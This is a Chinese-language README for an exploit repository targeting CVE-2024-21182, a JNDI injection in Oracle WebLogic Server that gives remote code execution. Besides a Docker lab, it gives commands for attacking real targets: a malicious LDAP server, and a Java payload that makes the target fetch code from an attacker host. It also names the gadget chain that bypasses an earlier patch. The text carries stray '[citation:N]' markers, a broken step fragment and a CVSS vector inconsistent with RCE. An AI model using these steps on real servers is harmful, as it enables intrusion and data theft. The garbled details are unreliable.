
针对CVE-2024-21182的概念验证利用程序,通过T3/IIOP协议在Oracle WebLogic Server中实现未经认证的JNDI注入,导致远程代码执行。包含用于测试的Docker实验环境。
CVE-2024-21182 - Oracle WebLogic Server JNDI 注入 → 远程代码执行
CVE-2024-21182 是一个未经身份验证的 JNDI 注入漏洞,影响 Oracle WebLogic Server 的 Core 组件。攻击者可通过 T3 或 IIOP 协议远程执行任意代码(RCE),从而完全获取服务器上的所有数据[citation:5][citation:8][citation:9]。
本仓库包含一个功能完整的 PoC(概念验证),展示了如何利用 AggregatableOpaqueReference + MessageDestinationReference 小工具链绕过 CVE-2023-21839 的补丁[citation:2][citation:4]。
| 属性 | 值 |
|---|---|
| CVE | CVE-2024-21182 |
| 产品 | Oracle WebLogic Server (Core) |
| 受影响版本 | 12.2.1.4.0 和 14.1.1.0.0[citation:7] |
| 可用补丁 | Oracle 关键补丁更新(2024年7月和2024年10月)[citation:6] |
| CISA KEV 状态 | 确认活跃利用(添加于 2026-01-06)[citation:3][citation:8] |
| CISA 缓解截止日期 | 2026-04-06[citation:8] |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
阶段 1:侦察:识别暴露 T3/IIOP 端口(7001)的 WebLogic 服务器。
阶段 2:分析:判断服务器是否运行受影响版本(12.2.1.4.0 或 14.1.1.0.0)或缺少 2024年10月补丁。
阶段 3:利用(技术流程):
AggregatableOpaqueReference 对象[citation:2]。referent,使其指向一个恶意的 MessageDestinationReference[citation:4]。wlthint3client.jar(可从 WebLogic 安装目录提取)。# 1. 克隆仓库
git clone https://github.com/your-username/CVE-2024-21182.git
cd CVE-2024-21182
# 2. 启动实验环境(受害者 + 攻击者)
docker-compose up -d
# 3. 执行自动利用
./validate.sh
针对真实目标的利用(需授权)
# 1. 启动恶意 LDAP/HTTP 服务器
python3 exploit/ldap_server.py
# 2. 在另一个终端中执行 Java 负载
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil
根据 CISA 当前状态:“是否已知用于勒索软件活动?未知”(但通常此类中间件的 RCE 是勒索软件入侵的初始向量)。
此代码仅供教育和研究目的。未经明确授权,滥用此 PoC 对付系统是违法的。作者不对任何误用此信息的行为负责。